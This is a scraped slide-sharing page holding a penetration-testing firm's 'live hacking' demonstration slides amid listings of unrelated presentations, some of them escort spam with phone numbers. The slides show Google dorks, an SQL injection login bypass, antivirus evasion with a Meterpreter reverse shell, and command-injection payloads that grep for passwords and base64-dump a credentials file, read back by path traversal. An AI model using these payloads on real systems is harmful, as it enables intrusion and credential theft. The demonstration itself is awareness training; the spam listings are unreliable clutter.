Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Último (20)

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

Live Hacking Agenda and Techniques

  • 2. Page 2SySS GmbH14/06/16 AGENDA 1. DOS attack against an internet web server 2. Deactivating burglar alarm 3. Attacking wireless keyboards 4. Mobile App and Web Service 5. SMS spoofing and identity theft 6. Attacks against crypto usb sticks 7. Smartphone trojan / SIM bug 8. Hardware hacker tools If time 1. USB attacks 2. Evading antivirus 3. SQL Injection
  • 3. Page 3SySS GmbH14/06/16 ABOUT THE SPEAKER Dipl.-Inform. Sebastian Schreiber Managing Director of SySS GmbH +49 (0)7071 - 40 78 56-0 sebastian.schreiber@syss.de
  • 4. Page 4SySS GmbH14/06/16 ABOUT SYSS GMBH Founded in 1998 At present: about 80 employees Based in Tübingen, southwest Germany Operating worldwide, focusing on Germany Rapidly growing: new campus providing space for 280 „Pentest Experts“ is under construction Services Penetration Testing & Security Analyses (95%) Incident Response/ Training/ Live Hacking Presentations (5%)
  • 5. Page 5SySS GmbH14/06/16 SELECTED INCIDENCES 2015 04/2015: „Russian Hackers Read Obama‘s Unclassified Emails“ – nytimes.com 05/2015: „IT Incident Deutscher Bundestag“ – tagesschau.de 07/2015: „Hacker remotely take over a Jeep Cherokee“ – heise.de 07/2015: „Hackers can disable a sniper rifle – or change its target“ – wired.de 07/2015: „Surveillance software: Hacking Team becoming Hacked Team“ – heise.de 08/2015: „Ashley Madison Dating Portal: Hacker stealing 11,2 Mio. passwords“ – golem.de 09/2015: „Cyber crime: Robbing fingerprints of more then five million US government employees” – wired.de 10/2015: „USA: Hacker stealing data about millions of T-Mobile customers “ – Spiegel.de 10/2015: „Online banking: New ways of attacking German mTAN“ – heise.de
  • 6. Page 6SySS GmbH14/06/16 GOOGLE HACKING Filetype:sql phpmyadmin wp_users inurl:warenkorb inurl:preis
  • 7. Page 7SySS GmbH14/06/16 LIVE-HACK HOTEL peter/peter http://www.live-hack.de/xss/xss.php Admin / passwort
  • 8. Page 8SySS GmbH14/06/16 SQL INJECTION IN LOG-IN FORMS SELECT * FROM users WHERE user='peter' AND password='peter‘ peter' OR 1=1# http://www.live-hack.de/xss/xss.php SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter’
  • 9. Page 9SySS GmbH14/06/16 DENIAL OF SERVICE (DOS) http://www.live-hack.de/clock.php Angriff: /home/livehack/thc/run.sh
  • 11. Page 11SySS GmbH14/06/16 ANTIVIRUS EVASION (1/2) How antivirus software works Blacklisting Whitelisting Blacklisting: How it works and its weak points Signature based: Searching for known patterns Unknown
  • 12. Page 12SySS GmbH14/06/16 ANTIVIRUS EVASION (2/2) Blacklisting: How it works and its weak points Signature-based: Searching for known patterns Unknown malware will not be detected Polymorphic malware has already been used for a long time to outsmart signature- based detection Behavior-based: Software is classified as harmless or harmful according to its behavior In general, rule-based technologies in combination with scoring procedures and fixed thresholds concerning calculated scores (heuristic procedures) Static code analysis: It is only possible to check code directly accessible within an executable file Dynamic code analysis during runtime (sandbox environment): Various limitations given by the sandbox environment (e.g., period of time, specific user actions like mouse clicks etc.)
  • 13. Page 13SySS GmbH14/06/16 ANTIVIRUS EVASION: LIVE DEMONSTRATION Free-of-charge malware protection for end-users and small business Uses the same technology and scan engine as System Center 2012 Endpoint Protection (formerly Forefront Endpoint Protection) Example for antivirus software: Microsoft Security Essentials Using the following antivirus evasion methods: Polymorphism Encryption + compression Detection of sandbox environments Malware: Meterpreter Shell (windows/meterpreter/reverse_https) of Metasploit Framework Creating an executable file containing known malware using the software “ShCoLo” by SySS GmbH
  • 14. Page 14SySS GmbH14/06/16 ANTIVIRUS EVASION: TEST RESULTS Product Version Date of virus definition file Operating system(s) of target systems Avira AntiVir Professional 10.2.0.1064 21.05.2013 Windows XP SP 3 (32 Bit) Windows 7 SP 1 (64 Bit) AVG Free 2013.0.2904 20.05.2013 Windows XP SP 3 (32 Bit) Kaspersky Endpoint Protection Workstation 8.1.0.831 21.05.2013 Windows XP SP 3 (32 Bit) McAfee SaaS Endpoint Protection 5400.1158 20.05.2013 Windows 7 SP 1 (64 Bit) Microsoft Security Essentials 4.1.522.0 21.05.2013 Windows XP SP 3 (32 Bit) Sophos Endpoint Security and Control 10.2 21.05.2013 Windows XP SP 3 (32 Bit) Symantec Endpoint Protection 12.1.1101.401 27.05.2013 Windows 7 SP 1 (64 Bit)
  • 15. Page 15SySS GmbH14/06/16 MOBILE PHONE TROJAN Symbian phone: 0049-177-6397937 SMS forwarding Activate the microphone Reboot Location info
  • 16. Page 16SySS GmbH14/06/16 FIPS 140-2 CERTIFIED CRYPTO USB STICKS (1/2)
  • 17. Page 17SySS GmbH14/06/16 FIPS 140-2 CERTIFIED CRYPTO USB STICKS (2/2)
  • 18. Page 18SySS GmbH14/06/16 ACTIONABLE TAKEAWAYS Be aware of digital attacks 24/7 Try to think like a hacker when applying IT safety measures Perform security assessments like penetration tests Stay alert and retest your IT security on regular basis Remember: The next vulnerability could just be found while attending this session
  • 20. Page 20SySS GmbH14/06/16 INJECTIONS, PHP MAGIC QUOTES http://livehack.syss.de/infoboard/index.php?mod=search Search for, e.g., “SySS” Search for !"§$%&/()=?`‘‚ Conclusio: PHP Magic Quotes Search for SySS $(sleep 4) $(grep -r -i password * > /tmp/passwd) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/passwd Search for $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/userdata.txt
  • 22. Page 22SySS GmbH14/06/16 Thank you very much for your attention! SySS – The Pentest Experts Sebastian Schreiber, Managing Director sebastian.schreiber@syss.de